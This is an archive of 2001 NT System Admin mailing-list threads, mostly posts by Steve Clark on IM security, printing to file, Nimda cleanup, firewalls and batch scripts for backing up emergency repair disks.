  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Kevin Lundy
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
9:35 AM
To: NT System Admin Issues
Subject: RE: Looking for a
discussion on IM

 

You know, I violated a
cardinal rule of mine - don't post something if you can't back it up.  I
did have a reference and now can't find it.  I did find a similar exploit
in the Yahoo messenger.  I'm still pretty confident I did read about either
a real attack via the icon, or at least a proof of concept, and I will keep
looking for it.  Anyway, the below is an exploit against an IM, so it
shows it is vulnerable.  

 

From http://www.ca.com/virusinfo/encyclopedia/

 

Yahoo Pager/Messanger
Buffer Overflow
There is a buffer
overflow problem with Yahoo Messenger that leaves the user vulnerable to remote
attack. The problem arises due to a lack of appropriate bounds checking on the
length of a URL that is received from another user inside a message.
Unfortunately, due to this oversight, it is possible for unprivileged and
possibly hostile remote users to execute arbitrary commands by overwriting the
EIP (return address) and filling the URL with malevolent code. The hostile code
could then be actioned when the unsuspecting target host clicks on the URL. 

-Original
Message-
From: Gordon W. Smith
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
9:07 AM
To: NT System Admin Issues
Subject: RE: Looking for a
discussion on IM

OUCH!  A virus in a
smiley?  Tell me more!  I couldn't find anything about it.

-Original
Message-
From: Kevin Lundy
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
7:50 AM
To: NT System Admin Issues
Subject: RE: Looking for a
discussion on IM

Two
things come to immediate mind:

 

1) Many
IM clients allow for file transfer.  Depending on your overall security
policy this in itself can be an issue.  Even if you allow people to
transfer files, the IM client then becomes a point of security control. 
For example, with AIM, it is supposed to ask the user if it is ok if their chat
partner sends them a file.  How long do you think it will be before
hackers manage to bypass that "confirmation"?  Further, then
they bad-guys could then just send a backdoor program to the hard disk. 
Or just pick up sensitive data from the computer.

 

2) There
has already been at least one IM based virus - done by embedding malicious code
in an icon smiley face.  This becomes another area where the anti-virus
vendors have to keep up. 

 

I'm sure
there are other reasons as well, those are just the 2 that come to my mind
before finishing my first cup of coffee.

-Original
Message-
From: Clark, Steve
[mailto:[EMAIL PROTECTED]]
Sent: Sunday, September 23, 2001
11:17 PM
To: NT System Admin Issues
Subject: Looking for a discussion
on IM

Hello,

 

I have been asked to research and potentially
implement IM for a company to communicate internally as well as externally.
However, I have always heard that IM was evil and to close it down ASAP. I
would like to hear real world implementation concerns/ tips as well as the
security issues associated.

 

Thanks in advance for your input.

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

"Who's watching your network?"

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: W2K Print to file

[Clark, Steve]

BFD - Ebay for $100. bottom line, why spend money on the product when he
doesn't need to?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Michael W. Ellis [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 9:51 AM
To: NT System Admin Issues
Subject: RE: W2K Print to file

Adobe Acrobat pricing from CDW:

http://www.cdw.com/shop/products/default.asp?EDC=279808
http://www.cdw.com/shop/products/default.asp?EDC=279809

($221.87 or $89.97 upgrade)

Michael



-Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 21, 2001 6:31 PM
To: NT System Admin Issues
Subject: RE: W2K Print to file


Yeah but adobe is like $400.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Mier, Juan [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 21, 2001 7:29 PM
To: NT System Admin Issues
Subject: RE: W2K Print to file

You could also install Adobe Acrobat and print to that.  That will
produce a PDF file that you can then print anywhere or just read with
Reader.

> -----Original Message-
> From: Clark, Steve [mailto:[EMAIL PROTECTED]]
> Sent: Friday, September 21, 2001 4:26 PM
> To: NT System Admin Issues
> Subject: RE: W2K Print to file
>
>
> Couldn't you just map a fake printer to a file - it would
> then prompt the user for a location and a name for a bit more
> control. In other words, install a HP LJ II driver and send
> it to a file rather than a port.
>
> Is that what you're looking for?
>
> Steve Clark
> Clark Systems Support, LLC
> AVIEN Charter Member
> "Who's watching your network?"
> www.clarksupport.com
>   301-610-9584 voice
>   240-465-0323 Efax
>
> -Original Message-
> From: Lefkovics, William [mailto:[EMAIL PROTECTED]]
> Sent: Friday, September 21, 2001 7:04 PM
> To: NT System Admin Issues
> Subject: W2K Print to file
>
> We have a 16bit legacy application that runs reports to dot
> matrix printers. We'd like to redirect this output to a file.
>
> In Windows2000, can I configure an LPT port to redirect to a
> file? I've seen previous utilities like Lpt2file and
> Redirect.  Are these still my best options?
>
> Thank you in advance.
>
> William
>
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Push Instalation

[Clark, Steve]

Build the install using IEAK. If the PC's are NT4 or W2K Pro, use can St
Bernard or something similar

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Ahmed Aboudeeb [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 9:47 AM
To: NT System Admin Issues
Subject: Push Instalation

hi to all
i need to install IE 5.5 to 100 users in our company, how can i do it as a
Push Instalation from the server. i have an NT 4.0 domain, just NT 4.0
servers.
thanks

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Ideas for firewall

[Clark, Steve]

Netscreen’s
are by far the easiest and best solution I’ve seen.

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 

-Original
Message-
From: Martijn Eindhoven
[mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001
4:55 AM
To: NT System Admin Issues
Subject: Ideas for firewall

 

Hey Guys,

I'm looking for a good firewall for about 50 w2k servers. What do you guys
think is the best setup, per server or one dedicated firewall.
And what is according to you guys the best firewall, i'm thinkin of a stateful
one. 







Met
vriendelijke groet,


M. Eindhoven
W2K System Administrator
Bevelander Internet Services B.V. 
Folkstoneweg 10 
1118 LM SCHIPHOL Zuidoost 
Tel : 020 40 53 900 
Fax : 020 40 53 910 
http://www.bevelander.nl
=

This communication contains information which is confidential and 
may also be privileged. It is for the exclusive use of the 
intended recipient(s). If you are not the intended recipient(s), 
please note that any distribution, copying or use of this 
communication or the information in it is strictly prohibited. 
If you have received this communication in error, please notify 
the sender immediately and then destroy any copies of it. 
=
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

Looking for a discussion on IM

[Clark, Steve]

Hello,

 

I have been asked to research and potentially implement IM for a company
to communicate internally as well as externally. However, I have always heard
that IM was evil and to close it down ASAP. I would like to hear real world implementation
concerns/ tips as well as the security issues associated.

 

Thanks in advance for your input.

 

Steve Clark

Clark Systems Support, LLC

AVIEN Charter Member

“Who's watching your network?”

www.clarksupport.com

  301-610-9584
voice

  240-465-0323
Efax

 




http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Nimda and patch end up shutting my Web Server

[Clark, Steve]

Read the documentation from CERT, Eeye and other virus/ security
authorities. If the virus was executed on your server, it will open ports
and cause damage that can not be 100% removed.

However, your statement "If you had a properly installed Hosted system, you
could determine what had been changed from a security standpoint." Sort of
negates your other comment. If a system was properly hosted, it probably
would have not been infected.

Bottom line, there are too many people that have reported trying to remove
using the tools that continue to be infected. It's just too much of a risk
to continue using a box that has unknown damage in a production environment.

My $.02.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Andrew S. Baker [mailto:[EMAIL PROTECTED]]
Sent: Sunday, September 23, 2001 10:17 AM
To: NT System Admin Issues
Subject: RE: Nimda and patch end up shutting my Web Server

>>Reformat. There is no way to 100% remove the
>>virus from your system.

I don't agree with that statement as an absolute, particularly if you
avoided rebooting the machine while the virus was running.

If you had a properly installed Hosted system, you could determine
what had been changed from a security standpoint.

Ultimately, rebuilding will be the safest way to resolve this issue
for those systems which are constantly infected.



==
 ASB - http://www.ultratech-llc.com/KB/?File=~MoreInfo.TXT
==
 "Feed a stranger's expired parking meter." -- H. Jackson Brown Jr.



>-Original Message-
>From: Clark, Steve [mailto:[EMAIL PROTECTED]]
>Sent: Sunday, September 23, 2001 9:55 AM
>To: NT System Admin Issues
>Subject: RE: Nimda and patch end up shutting my Web Server
>
>
>Reformat. There is no way to 100% remove the virus from your system.
>
>You can download and run utilities from Eeye, Norton, NAI,
>Commandcenter
>.. But the bottom line, it's not going to be 100% cleaned.
>
>Steve Clark
>Clark Systems Support, LLC
>AVIEN Charter Member
>www.clarksupport.com
>   301-610-9584 voice
>   240-465-0323 Efax
>
>-Original Message-
>From: Vani Murarka [mailto:[EMAIL PROTECTED]]
>Sent: Sunday, September 23, 2001 9:49 AM
>To: NT System Admin Issues
>Subject: Nimda and patch end up shutting my Web Server
>
>NT and IIS Gurus, please help.
>
>My system was infected by Nimda. Norton found certain TFTPxxx files
>under Inetpub/scripts which were infected. It could not clean it. It
>quarantined it. I deleted those files. But new TFTPxxx files kept
>getting created in that directory, and Norton kept saying those are
>infected with Nimda.
>
>I searched the internet to see what patch I must install. Following
>links from Symantec, this is the one I downloaded and installed -
>http://www.microsoft.com/ntserver/nts/downloads/critical/q269
862/default
.asp

The patch was called "Windows 4.0 Hotfix"

Ever since installing that, my Web Server does not run. Trying to run
it from Internet Service Manager, says, "The specified module could
not
be found".

I am also not being unable to uninstall the patch from Control Panel -
Add/Remove Programs as the page from where I downloaded it suggests,
because it is not listed there.

Maybe I selected the inappropriate patch - but now I am at a loss as
to
what to do next.

Please give pointers.

Thanks

Vani



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Nimda and patch end up shutting my Web Server

[Clark, Steve]

Reformat. There is no way to 100% remove the virus from your system.

You can download and run utilities from Eeye, Norton, NAI, Commandcenter
.. But the bottom line, it's not going to be 100% cleaned.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Vani Murarka [mailto:[EMAIL PROTECTED]]
Sent: Sunday, September 23, 2001 9:49 AM
To: NT System Admin Issues
Subject: Nimda and patch end up shutting my Web Server

NT and IIS Gurus, please help.

My system was infected by Nimda. Norton found certain TFTPxxx files
under Inetpub/scripts which were infected. It could not clean it. It
quarantined it. I deleted those files. But new TFTPxxx files kept
getting created in that directory, and Norton kept saying those are
infected with Nimda.

I searched the internet to see what patch I must install. Following
links from Symantec, this is the one I downloaded and installed -
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default
.asp

The patch was called "Windows 4.0 Hotfix"

Ever since installing that, my Web Server does not run. Trying to run
it from Internet Service Manager, says, "The specified module could not
be found".

I am also not being unable to uninstall the patch from Control Panel -
Add/Remove Programs as the page from where I downloaded it suggests,
because it is not listed there.

Maybe I selected the inappropriate patch - but now I am at a loss as to
what to do next.

Please give pointers.

Thanks

Vani


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Blue screen (ntoskrnl)

[Clark, Steve]

http://support.microsoft.com/support/kb/articles/Q119/4/67.asp

Also, I recall a utility from Dr Dos (I think) that would give you a free
boot disk utility. Something to consider for future - the IDR from Veritas
accompanied with a fll backup will restore a server from boot disk and tape
drive.

Excellent product and service.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Stephen Moreau [mailto:[EMAIL PROTECTED]]
Sent: Saturday, September 22, 2001 7:18 PM
To: NT System Admin Issues
Subject: RE: Blue screen (ntoskrnl)

Thanks, Steve, for the batch files.  I'll give 'em a try.  Anything to
make things a little easier.  Do you know how to make a bootable floppy
for NT?  I can restore the system files/registry from tape but I need a
way to get into my dead system to replace the files.

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Blue screen (ntoskrnl)

[Clark, Steve]

As long as the rdisk /s works on W2K it will work. Here's the scripts:

Each Sunday night at 0 dark thirty, this bath file runs:
@echo off
REM Created by Steve Clark - Clark Systems Support, LLC
REM to automatically backup the registry and such
REM Copies to \\server\drivers\erd\%computername%
REM Date: 2/17/00
%windir%\system32/rdisk /s-
if not exist d:\drivers\winnt\erd\%computername% md
d:\drivers\winnt\erd\%computername%
copy %windir%\repair\*.* d:\drivers\winnt\erd\%computername%\
 
The one time per month, I email the zip files to myself using BLAT
REM This will email the ERD for all 
REM servers at office
REM Created 6/10 by Steve Clark - Clark Systems Support, LLC
REM --
d:\drivers\winnt\erd\pkzip.exe d:\drivers\winnt\erd\server.zip
d:\drivers\winnt\erd\server\*.*
c:\blat\blat c:\blat\erd.txt -s "ERD's for office" -t [EMAIL PROTECTED]
-attach d:\drivers\winnt\erd\server.zip
 
It may not be the prettiest solution but I now have the ERD's in my office,
on the backup tape as well as on a different server than the source. 

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Saturday, September 22, 2001 6:50 PM
To: Clark, Steve
Subject: RE: Blue screen (ntoskrnl)

Hi Steve

Is the batch process for win2k ? if so could you please send it over
to me, thanks  in advance

Gareth

>>>>

Nice - welcome to the new company!

I've got a batch process to create ERD's automatically if you're interested.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Stephen Moreau [mailto:[EMAIL PROTECTED]]
Sent: Saturday, September 22, 2001 6:46 PM
To: NT System Admin Issues
Subject: Re: Blue screen (ntoskrnl)

Thanks for the info but I recently took over these servers (the admin
before me quit) and he didn't maintain the erd.  I tried the emergency
repair process and told the process to look on the harddrives but it
didn't work.

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Blue screen (ntoskrnl)

[Clark, Steve]

Nice - welcome to the new company!

I've got a batch process to create ERD's automatically if you're interested.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Stephen Moreau [mailto:[EMAIL PROTECTED]]
Sent: Saturday, September 22, 2001 6:46 PM
To: NT System Admin Issues
Subject: Re: Blue screen (ntoskrnl)

Thanks for the info but I recently took over these servers (the admin
before me quit) and he didn't maintain the erd.  I tried the emergency
repair process and told the process to look on the harddrives but it
didn't work.

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: OT on Windows ME

[Clark, Steve]

Don't know much about ME other than it's a stripped out version of W2K. Can
you look at the logs or do a Ctrl-Alt-Del and look at what's running when it
slows.

My focus is small shops - I realize money is very tight; however, you need
to get rid of ME from the standpoint of your company trying to do anything
network related down the road ME will not support.

Good luck.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
Sent: Saturday, September 22, 2001 2:08 AM
To: NT System Admin Issues
Subject: OT on Windows ME


I have been a member of this list for about a month. We are a small company
and I don't have the benefit of a large IT dept so I thought I'd throw this
question to you guys. My personal PC is a Windows ME PC. Today it started
doing something really weird. About every two hours it just kind of stops. I
mean, it still works and all ( although there is no more Internet access)
but it is very, very slow. Can't hardly move the mouse and I have to
shutdown too get it back. It's weird because it goes south almost like clock
work every 1.5 to 2 hours. I don't have a virus, I am fairly certain of
that. It actually happens all of a sudden, yea, I sat here and waited for it
to happen. It doesn't seem to be a gradual thing, I mean, it doesn't get
progressively slow, it happens all at once all of a sudden. It is a royal
PITA.

Any ideas? :

Thanks,

John Cesta


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: W2K Print to file

[Clark, Steve]

Agreed - it works very well. I contacted a sales person recently regarding
PDF sales crap. She said - I'll turn that into our marketing people. I ran
the company's white paper through the distiller and sent it to her in email.
I love turning the complicated into simplicity and spinning the sales
people.

Some days, I love this stuff.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 21, 2001 7:40 PM
To: NT System Admin Issues
Subject: RE: W2K Print to file

But it is the perfect solution

-Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 21, 2001 4:31 PM
To: NT System Admin Issues
Subject: RE: W2K Print to file


Yeah but adobe is like $400.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Mier, Juan [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 21, 2001 7:29 PM
To: NT System Admin Issues
Subject: RE: W2K Print to file

You could also install Adobe Acrobat and print to that.  That will
produce a PDF file that you can then print anywhere or just read with
Reader.

> -Original Message-
> From: Clark, Steve [mailto:[EMAIL PROTECTED]]
> Sent: Friday, September 21, 2001 4:26 PM
> To: NT System Admin Issues
> Subject: RE: W2K Print to file
>
>
> Couldn't you just map a fake printer to a file - it would then prompt
> the user for a location and a name for a bit more control. In other
> words, install a HP LJ II driver and send it to a file rather than a
> port.
>
> Is that what you're looking for?
>
> Steve Clark
> Clark Systems Support, LLC
> AVIEN Charter Member
> "Who's watching your network?"
> www.clarksupport.com
>   301-610-9584 voice
>   240-465-0323 Efax
>
> -Original Message-
> From: Lefkovics, William [mailto:[EMAIL PROTECTED]]
> Sent: Friday, September 21, 2001 7:04 PM
> To: NT System Admin Issues
> Subject: W2K Print to file
>
> We have a 16bit legacy application that runs reports to dot matrix
> printers. We'd like to redirect this output to a file.
>
> In Windows2000, can I configure an LPT port to redirect to a file?
> I've seen previous utilities like Lpt2file and Redirect.  Are these
> still my best options?
>
> Thank you in advance.
>
> William
>
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: W2K Print to file

[Clark, Steve]

More centralized - more complicated? It can be pushed across a network as
opposed to running to each wkst and mapping the drive. I don't know about
you but 90% of the time I've mapped through the GUI, it fails on reboot
regardless of the settings. Forcing through batch seems to work each time.
Regardless of the method, we both arrive at the same solution - I've been on
the end of touching each one and it gets old.

My $.02.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Joe L. Casale [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 21, 2001 7:39 PM
To: NT System Admin Issues
Subject: RE: W2K Print to file

Isn't that essentially more complicated way of doing what I said?
You can share the "File" printer on your own wkst, then map an lptx to
it on your wkst...
jlc

-Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 21, 2001 5:36 PM
To: NT System Admin Issues
Subject: RE: W2K Print to file

So do a net use to a bogus printer (will have to do the share on the
server)
and remap to the port. Reconnect using a batch file in the Run key of
startup so you don't have to worry about someone removing by accident -
lusers.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Joe L. Casale [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 21, 2001 7:33 PM
To: NT System Admin Issues
Subject: RE: W2K Print to file

I am guessing no, cuz the dos program doesn't know windows printers, it
knows hardware lpt's... I think you will have to use the acro idea, or
one of your programs you mentioned. You could create the printer as you
said, but then map another ltpx to that one, and see if that works...
jlc

-Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 21, 2001 5:26 PM
To: NT System Admin Issues
Subject: RE: W2K Print to file

Couldn't you just map a fake printer to a file - it would then prompt
the
user for a location and a name for a bit more control. In other words,
install a HP LJ II driver and send it to a file rather than a port.

Is that what you're looking for?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Lefkovics, William [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 21, 2001 7:04 PM
To: NT System Admin Issues
Subject: W2K Print to file

We have a 16bit legacy application that runs reports to dot matrix
printers.
We'd like to redirect this output to a file.

In Windows2000, can I configure an LPT port to redirect to a file?
I've seen previous utilities like Lpt2file and Redirect.  Are these
still my
best options?

Thank you in advance.

William

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: W2K Print to file

[Clark, Steve]

So do a net use to a bogus printer (will have to do the share on the server)
and remap to the port. Reconnect using a batch file in the Run key of
startup so you don't have to worry about someone removing by accident -
lusers.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Joe L. Casale [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 21, 2001 7:33 PM
To: NT System Admin Issues
Subject: RE: W2K Print to file

I am guessing no, cuz the dos program doesn't know windows printers, it
knows hardware lpt's... I think you will have to use the acro idea, or
one of your programs you mentioned. You could create the printer as you
said, but then map another ltpx to that one, and see if that works...
jlc

-----Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 21, 2001 5:26 PM
To: NT System Admin Issues
Subject: RE: W2K Print to file

Couldn't you just map a fake printer to a file - it would then prompt
the
user for a location and a name for a bit more control. In other words,
install a HP LJ II driver and send it to a file rather than a port.

Is that what you're looking for?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Lefkovics, William [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 21, 2001 7:04 PM
To: NT System Admin Issues
Subject: W2K Print to file

We have a 16bit legacy application that runs reports to dot matrix
printers.
We'd like to redirect this output to a file.

In Windows2000, can I configure an LPT port to redirect to a file?
I've seen previous utilities like Lpt2file and Redirect.  Are these
still my
best options?

Thank you in advance.

William

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: W2K Print to file

[Clark, Steve]

Yeah but adobe is like $400. 

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Mier, Juan [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 21, 2001 7:29 PM
To: NT System Admin Issues
Subject: RE: W2K Print to file

You could also install Adobe Acrobat and print to that.  That will
produce a PDF file that you can then print anywhere or just read with
Reader.

> -Original Message-----
> From: Clark, Steve [mailto:[EMAIL PROTECTED]]
> Sent: Friday, September 21, 2001 4:26 PM
> To: NT System Admin Issues
> Subject: RE: W2K Print to file
>
>
> Couldn't you just map a fake printer to a file - it would
> then prompt the user for a location and a name for a bit more
> control. In other words, install a HP LJ II driver and send
> it to a file rather than a port.
>
> Is that what you're looking for?
>
> Steve Clark
> Clark Systems Support, LLC
> AVIEN Charter Member
> "Who's watching your network?"
> www.clarksupport.com
>   301-610-9584 voice
>   240-465-0323 Efax
>
> -Original Message-
> From: Lefkovics, William [mailto:[EMAIL PROTECTED]]
> Sent: Friday, September 21, 2001 7:04 PM
> To: NT System Admin Issues
> Subject: W2K Print to file
>
> We have a 16bit legacy application that runs reports to dot
> matrix printers. We'd like to redirect this output to a file.
>
> In Windows2000, can I configure an LPT port to redirect to a
> file? I've seen previous utilities like Lpt2file and
> Redirect.  Are these still my best options?
>
> Thank you in advance.
>
> William
>
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: W2K Print to file

[Clark, Steve]

Couldn't you just map a fake printer to a file - it would then prompt the
user for a location and a name for a bit more control. In other words,
install a HP LJ II driver and send it to a file rather than a port.

Is that what you're looking for?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Lefkovics, William [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 21, 2001 7:04 PM
To: NT System Admin Issues
Subject: W2K Print to file

We have a 16bit legacy application that runs reports to dot matrix printers.
We'd like to redirect this output to a file.

In Windows2000, can I configure an LPT port to redirect to a file?
I've seen previous utilities like Lpt2file and Redirect.  Are these still my
best options?

Thank you in advance.

William

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Is there any way to know for sure? More Nimda stuff.

[Clark, Steve]

Greatt.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
"Who's watching your network?"
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Sullivan, Glenn [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 21, 2001 2:53 PM
To: NT System Admin Issues
Subject: RE: Is there any way to know for sure? More Nimda stuff.

It looks like a little guys head, with Grey skin, black hair, and a light
blue shirt, but so does everyone else's account...

(sorry, I couldn't resist.  And it's Friday...)

Glenn Sullivan, MCSE+I  MCDBA
David Clark Company Inc.


-----Original Message-
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 21, 2001 2:44 PM
To: NT System Admin Issues
Subject: RE: Is there any way to know for sure? More Nimda stuff.


What does the guest account look like?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Jay Woody [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 21, 2001 2:40 PM
To: NT System Admin Issues
Subject: Is there any way to know for sure? More Nimda stuff.

Maybe I am being paranoid.  I have a server that the eeye scanner says is
not vulnerable, I don't see any .eml files on it and when I scan for files
changed since the 18th, there are no .exes.  However, when I look at the
task list, it shows 2 CMD.EXEs open.  I have one open but not two.  Am I
being weird here?  The second CMD.EXE un-nerves me, but I can't find any
other sign of infection.  Is there any one, "sure fire" way to KNOW that the
box has been hit?  Is there one registry entry or file or something that the
virus ALWAYS does so I can see if the box is hit?

I am thinking about re-building it, just in case, but if I can leave it up,
I would obviously prefer that.  Any ideas?

JayW


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Is there any way to know for sure? More Nimda stuff.

[Clark, Steve]

What does the guest account look like?

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-Original Message-
From: Jay Woody [mailto:[EMAIL PROTECTED]]
Sent: Friday, September 21, 2001 2:40 PM
To: NT System Admin Issues
Subject: Is there any way to know for sure? More Nimda stuff.

Maybe I am being paranoid.  I have a server that the eeye scanner says is
not vulnerable, I don't see any .eml files on it and when I scan for files
changed since the 18th, there are no .exes.  However, when I look at the
task list, it shows 2 CMD.EXEs open.  I have one open but not two.  Am I
being weird here?  The second CMD.EXE un-nerves me, but I can't find any
other sign of infection.  Is there any one, "sure fire" way to KNOW that the
box has been hit?  Is there one registry entry or file or something that the
virus ALWAYS does so I can see if the box is hit?

I am thinking about re-building it, just in case, but if I can leave it up,
I would obviously prefer that.  Any ideas?

JayW


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm

RE: Nimda and HTML Files

[Clark, Steve]

www.nai.com - look for the virus description and it tells you the lines
added,

